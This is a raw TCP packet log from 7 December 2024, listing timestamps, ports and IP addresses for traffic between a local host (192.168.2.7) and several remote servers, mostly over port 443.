Dec 7, 2024 12:59:25.733463049 CET	443	49735	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:25.774328947 CET	49735	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:25.778652906 CET	80	49743	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:25.861105919 CET	443	49737	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.861136913 CET	443	49736	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.861718893 CET	49737	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:25.861723900 CET	49736	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:25.861742020 CET	443	49737	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.861749887 CET	443	49736	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.862323999 CET	49736	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:25.862329006 CET	443	49736	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.862468004 CET	49737	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:25.862473965 CET	443	49737	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.915484905 CET	443	49733	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.915560007 CET	443	49733	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.915771961 CET	49733	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:25.915837049 CET	49733	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:25.915858030 CET	443	49733	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.915870905 CET	49733	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:25.915878057 CET	443	49733	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.916146040 CET	443	49732	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.916207075 CET	443	49732	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.916304111 CET	49732	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:25.916459084 CET	49732	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:25.916470051 CET	443	49732	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.916495085 CET	49732	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:25.916501045 CET	443	49732	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.919084072 CET	49744	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:25.919117928 CET	443	49744	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.919121027 CET	49745	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:25.919159889 CET	443	49745	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.919178009 CET	49744	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:25.919208050 CET	49745	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:25.919341087 CET	49745	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:25.919352055 CET	443	49745	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.919471979 CET	49744	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:25.919486046 CET	443	49744	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:26.131823063 CET	443	49734	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:26.131889105 CET	443	49734	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:26.132102013 CET	49734	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:26.132185936 CET	49734	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:26.132201910 CET	443	49734	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:26.132213116 CET	49734	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:26.132217884 CET	443	49734	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:26.135648012 CET	49746	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:26.135690928 CET	443	49746	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:26.135757923 CET	49746	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:26.135962009 CET	49746	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:26.135977030 CET	443	49746	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:26.155667067 CET	443	49739	23.32.185.164	192.168.2.7
Dec 7, 2024 12:59:26.155733109 CET	49739	443	192.168.2.7	23.32.185.164
Dec 7, 2024 12:59:26.158502102 CET	49739	443	192.168.2.7	23.32.185.164
Dec 7, 2024 12:59:26.158508062 CET	443	49739	23.32.185.164	192.168.2.7
Dec 7, 2024 12:59:26.158734083 CET	443	49739	23.32.185.164	192.168.2.7
Dec 7, 2024 12:59:26.198901892 CET	49739	443	192.168.2.7	23.32.185.164
Dec 7, 2024 12:59:26.239334106 CET	443	49739	23.32.185.164	192.168.2.7
Dec 7, 2024 12:59:26.295701981 CET	443	49737	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:26.295783043 CET	443	49737	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:26.295924902 CET	49737	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:26.295964003 CET	49737	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:26.295977116 CET	443	49737	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:26.295989990 CET	49737	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:26.295995951 CET	443	49737	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:26.296053886 CET	443	49736	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:26.296111107 CET	443	49736	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:26.296166897 CET	49736	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:26.296283007 CET	49736	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:26.296283007 CET	49736	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:26.296298981 CET	443	49736	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:26.296309948 CET	443	49736	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:26.299159050 CET	49747	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:26.299180984 CET	443	49747	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:26.299251080 CET	49748	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:26.299284935 CET	443	49748	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:26.299285889 CET	49747	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:26.299336910 CET	49748	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:26.299624920 CET	49747	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:26.299635887 CET	443	49747	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:26.299736023 CET	49748	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:26.299751043 CET	443	49748	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:26.485656023 CET	443	49738	52.149.20.212	192.168.2.7
Dec 7, 2024 12:59:26.485728025 CET	49738	443	192.168.2.7	52.149.20.212
Dec 7, 2024 12:59:26.487643957 CET	49738	443	192.168.2.7	52.149.20.212
Dec 7, 2024 12:59:26.487657070 CET	443	49738	52.149.20.212	192.168.2.7
Dec 7, 2024 12:59:26.487916946 CET	443	49738	52.149.20.212	192.168.2.7
Dec 7, 2024 12:59:26.539891005 CET	49738	443	192.168.2.7	52.149.20.212
Dec 7, 2024 12:59:26.673532963 CET	443	49739	23.32.185.164	192.168.2.7
Dec 7, 2024 12:59:26.673598051 CET	443	49739	23.32.185.164	192.168.2.7
Dec 7, 2024 12:59:26.673727989 CET	49739	443	192.168.2.7	23.32.185.164
Dec 7, 2024 12:59:26.673768997 CET	443	49739	23.32.185.164	192.168.2.7
Dec 7, 2024 12:59:26.673784018 CET	49739	443	192.168.2.7	23.32.185.164
Dec 7, 2024 12:59:26.673791885 CET	443	49739	23.32.185.164	192.168.2.7
Dec 7, 2024 12:59:26.716927052 CET	49750	443	192.168.2.7	23.32.185.164
Dec 7, 2024 12:59:26.716965914 CET	443	49750	23.32.185.164	192.168.2.7
Dec 7, 2024 12:59:26.717041969 CET	49750	443	192.168.2.7	23.32.185.164
Dec 7, 2024 12:59:26.717506886 CET	49750	443	192.168.2.7	23.32.185.164
Dec 7, 2024 12:59:26.717520952 CET	443	49750	23.32.185.164	192.168.2.7
Dec 7, 2024 12:59:26.948139906 CET	49753	443	192.168.2.7	172.217.17.46
Dec 7, 2024 12:59:26.948180914 CET	443	49753	172.217.17.46	192.168.2.7
Dec 7, 2024 12:59:26.948237896 CET	49753	443	192.168.2.7	172.217.17.46
Dec 7, 2024 12:59:26.948416948 CET	49753	443	192.168.2.7	172.217.17.46
Dec 7, 2024 12:59:26.948431969 CET	443	49753	172.217.17.46	192.168.2.7
Dec 7, 2024 12:59:27.485055923 CET	80	49743	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:27.485172987 CET	49743	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:27.547545910 CET	49743	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:27.552721977 CET	49753	443	192.168.2.7	172.217.17.46
Dec 7, 2024 12:59:27.552726030 CET	49735	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:27.633908033 CET	443	49745	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:27.634985924 CET	49745	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:27.635018110 CET	443	49745	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:27.635680914 CET	49745	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:27.635691881 CET	443	49745	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:27.635700941 CET	443	49744	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:27.636171103 CET	49744	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:27.636200905 CET	443	49744	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:27.636678934 CET	49744	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:27.636692047 CET	443	49744	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:27.667459965 CET	80	49743	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:27.851912975 CET	443	49746	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:27.852922916 CET	49746	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:27.852957964 CET	443	49746	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:27.853421926 CET	49746	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:27.853431940 CET	443	49746	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:27.957211971 CET	49738	443	192.168.2.7	52.149.20.212
Dec 7, 2024 12:59:27.999329090 CET	443	49738	52.149.20.212	192.168.2.7
Dec 7, 2024 12:59:28.013451099 CET	443	49748	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.015259027 CET	443	49747	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.015305996 CET	49748	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.015333891 CET	443	49748	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.015503883 CET	49748	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.015508890 CET	443	49748	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.015814066 CET	49747	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.015841007 CET	443	49747	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.016107082 CET	49747	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.016114950 CET	443	49747	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.068377018 CET	443	49745	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.068445921 CET	443	49745	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.068875074 CET	49745	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.068912983 CET	49745	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.068912983 CET	49745	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.068933964 CET	443	49745	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.068943977 CET	443	49745	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.069694042 CET	443	49744	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.069756985 CET	443	49744	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.069814920 CET	49744	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.070055008 CET	49744	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.070055008 CET	49744	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.070075035 CET	443	49744	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.070086956 CET	443	49744	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.072235107 CET	49755	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.072273970 CET	443	49755	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.072732925 CET	49755	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.072885990 CET	49755	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.072901964 CET	443	49755	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.074790001 CET	49756	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.074830055 CET	443	49756	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.074971914 CET	49756	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.075123072 CET	49756	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.075144053 CET	443	49756	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.101571083 CET	443	49750	23.32.185.164	192.168.2.7
Dec 7, 2024 12:59:28.101664066 CET	49750	443	192.168.2.7	23.32.185.164
Dec 7, 2024 12:59:28.116569996 CET	49750	443	192.168.2.7	23.32.185.164
Dec 7, 2024 12:59:28.116588116 CET	443	49750	23.32.185.164	192.168.2.7
Dec 7, 2024 12:59:28.116815090 CET	443	49750	23.32.185.164	192.168.2.7
Dec 7, 2024 12:59:28.120526075 CET	49750	443	192.168.2.7	23.32.185.164
Dec 7, 2024 12:59:28.167329073 CET	443	49750	23.32.185.164	192.168.2.7
Dec 7, 2024 12:59:28.286454916 CET	443	49746	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.286523104 CET	443	49746	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.286575079 CET	49746	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.286813021 CET	49746	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.286834002 CET	443	49746	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.286845922 CET	49746	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.286851883 CET	443	49746	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.289581060 CET	49757	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.289609909 CET	443	49757	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.289681911 CET	49757	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.289908886 CET	49757	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.289918900 CET	443	49757	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.447949886 CET	443	49748	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.448023081 CET	443	49748	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.448093891 CET	49748	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.450522900 CET	443	49747	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.450582027 CET	443	49747	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.450692892 CET	49747	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.478493929 CET	49748	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.478519917 CET	443	49748	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.480891943 CET	49747	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.480921984 CET	443	49747	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.480940104 CET	49747	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.480946064 CET	443	49747	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.483002901 CET	80	49743	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:28.483143091 CET	49743	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:28.484369993 CET	49758	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.484400988 CET	443	49758	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.484492064 CET	49758	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.491437912 CET	49758	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.491451025 CET	443	49758	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.494294882 CET	49759	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.494332075 CET	443	49759	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.494396925 CET	49759	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.494568110 CET	49759	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:28.494576931 CET	443	49759	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:28.530416965 CET	443	49738	52.149.20.212	192.168.2.7
Dec 7, 2024 12:59:28.530452013 CET	443	49738	52.149.20.212	192.168.2.7
Dec 7, 2024 12:59:28.530461073 CET	443	49738	52.149.20.212	192.168.2.7
Dec 7, 2024 12:59:28.530483961 CET	443	49738	52.149.20.212	192.168.2.7
Dec 7, 2024 12:59:28.530495882 CET	49738	443	192.168.2.7	52.149.20.212
Dec 7, 2024 12:59:28.530500889 CET	443	49738	52.149.20.212	192.168.2.7
Dec 7, 2024 12:59:28.530518055 CET	443	49738	52.149.20.212	192.168.2.7
Dec 7, 2024 12:59:28.530536890 CET	49738	443	192.168.2.7	52.149.20.212
Dec 7, 2024 12:59:28.530546904 CET	443	49738	52.149.20.212	192.168.2.7
Dec 7, 2024 12:59:28.530558109 CET	49738	443	192.168.2.7	52.149.20.212
Dec 7, 2024 12:59:28.530584097 CET	49738	443	192.168.2.7	52.149.20.212
Dec 7, 2024 12:59:28.549925089 CET	443	49738	52.149.20.212	192.168.2.7
Dec 7, 2024 12:59:28.549998999 CET	49738	443	192.168.2.7	52.149.20.212
Dec 7, 2024 12:59:28.550007105 CET	443	49738	52.149.20.212	192.168.2.7
Dec 7, 2024 12:59:28.550033092 CET	443	49738	52.149.20.212	192.168.2.7
Dec 7, 2024 12:59:28.550088882 CET	49738	443	192.168.2.7	52.149.20.212
Dec 7, 2024 12:59:28.552360058 CET	49738	443	192.168.2.7	52.149.20.212
Dec 7, 2024 12:59:28.552360058 CET	49738	443	192.168.2.7	52.149.20.212
Dec 7, 2024 12:59:28.552376986 CET	443	49738	52.149.20.212	192.168.2.7
Dec 7, 2024 12:59:28.552385092 CET	443	49738	52.149.20.212	192.168.2.7
Dec 7, 2024 12:59:28.624006033 CET	443	49750	23.32.185.164	192.168.2.7
Dec 7, 2024 12:59:28.624070883 CET	443	49750	23.32.185.164	192.168.2.7
Dec 7, 2024 12:59:28.624140024 CET	49750	443	192.168.2.7	23.32.185.164
Dec 7, 2024 12:59:28.638223886 CET	49750	443	192.168.2.7	23.32.185.164
Dec 7, 2024 12:59:28.638242006 CET	443	49750	23.32.185.164	192.168.2.7
Dec 7, 2024 12:59:29.795459986 CET	443	49756	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:29.795486927 CET	443	49755	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:29.836774111 CET	49756	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:29.837161064 CET	49755	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.005958080 CET	443	49757	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.055519104 CET	49757	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.099649906 CET	49756	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.099666119 CET	443	49756	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.101690054 CET	49756	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.101696968 CET	443	49756	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.108439922 CET	49755	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.108462095 CET	443	49755	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.124715090 CET	49755	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.124725103 CET	443	49755	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.205367088 CET	443	49758	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.209624052 CET	443	49759	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.258644104 CET	49758	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.259922028 CET	49759	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.284379005 CET	49757	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.284420013 CET	443	49757	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.285069942 CET	49757	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.285075903 CET	443	49757	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.348237991 CET	49758	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.348243952 CET	443	49758	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.348368883 CET	49759	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.348411083 CET	443	49759	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.348786116 CET	49758	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.348790884 CET	443	49758	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.348917961 CET	49759	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.348927975 CET	443	49759	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.416666985 CET	443	49756	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.416743994 CET	443	49756	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.416785955 CET	49756	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.418567896 CET	49756	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.418580055 CET	443	49756	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.418591022 CET	49756	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.418596029 CET	443	49756	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.434683084 CET	49760	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.434719086 CET	443	49760	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.434776068 CET	49760	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.436693907 CET	49760	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.436718941 CET	443	49760	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.440721989 CET	443	49755	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.440862894 CET	443	49755	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.440916061 CET	49755	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.441143036 CET	49755	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.441159964 CET	443	49755	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.441169977 CET	49755	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.441174984 CET	443	49755	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.445741892 CET	49761	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.445797920 CET	443	49761	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.445858002 CET	49761	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.446863890 CET	49761	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.446892023 CET	443	49761	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.600769997 CET	443	49757	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.600835085 CET	443	49757	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.600888968 CET	49757	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.602144003 CET	49757	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.602171898 CET	443	49757	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.602188110 CET	49757	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.602195024 CET	443	49757	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.609127998 CET	49762	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.609162092 CET	443	49762	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.609225035 CET	49762	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.610184908 CET	49762	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.610207081 CET	443	49762	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.664113998 CET	443	49758	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.664195061 CET	443	49758	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.664246082 CET	49758	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.664910078 CET	443	49759	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.664975882 CET	443	49759	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.665023088 CET	49759	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.725944996 CET	49758	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.725965977 CET	443	49758	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.725975990 CET	49758	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.725981951 CET	443	49758	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.731431961 CET	49759	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.731467962 CET	443	49759	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.731491089 CET	49759	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.731498957 CET	443	49759	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.832668066 CET	49763	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.832756996 CET	443	49763	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.832833052 CET	49763	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.879502058 CET	49764	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.879544973 CET	443	49764	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.879617929 CET	49764	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.880487919 CET	49763	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.880533934 CET	443	49763	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:30.888801098 CET	49764	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:30.888817072 CET	443	49764	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.153013945 CET	443	49760	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.153455973 CET	49760	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.153470039 CET	443	49760	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.153949976 CET	49760	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.153958082 CET	443	49760	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.163373947 CET	443	49761	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.163717031 CET	49761	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.163742065 CET	443	49761	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.164148092 CET	49761	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.164153099 CET	443	49761	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.356466055 CET	443	49762	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.357017040 CET	49762	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.357037067 CET	443	49762	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.357505083 CET	49762	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.357513905 CET	443	49762	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.590193987 CET	443	49760	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.590267897 CET	443	49760	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.590409040 CET	49760	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.590809107 CET	49760	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.590817928 CET	443	49760	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.590828896 CET	49760	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.590833902 CET	443	49760	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.595904112 CET	49765	443	192.168.2.7	13.107.246.63
